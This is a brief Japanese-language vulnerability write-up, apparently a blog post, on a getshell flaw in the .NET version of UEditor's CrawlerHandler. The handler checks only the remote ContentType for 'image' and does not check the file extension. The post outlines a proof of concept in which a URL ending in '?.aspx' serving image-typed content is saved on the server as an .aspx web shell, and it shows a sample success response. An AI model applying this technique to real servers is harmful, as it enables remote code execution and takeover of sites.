UEditor .Netバージョンgetshell
1265 ワード
脆弱性の詳細
https://github.com/fex-team/ueditor/blob/dev-1.5.0/net/App_Code/CrawlerHandler.csCrawlerメソッドによるsource[]のチェックはContentTypeのみ
if (response.ContentType.IndexOf("image") == -1)
{
State = "Url is not an image";
return this;
}
ファイル拡張子をチェックせずにそのままローカルに保存するとgetshell POCになります.
shell addrはhttp://www.xxx.com/xxx.jpg?.aspxの方式で木馬を含む画像(サーバを戻すためのContentTypeはimage/xxx)を使用してもよいhttp://www.xxxx.com/xxx.php?.aspxそしてxxx.phpでContentTypeを自分で設定
次のように返します.
{"state":"SUCCESS","list":[{"state":"SUCCESS","source":"http://www.xxxx.com//upload/Encyclopedias/201808/03/2018080300550278683.png?.aspx","url":"/upload/image/201808/03/6366885698033038502306919.aspx"}]}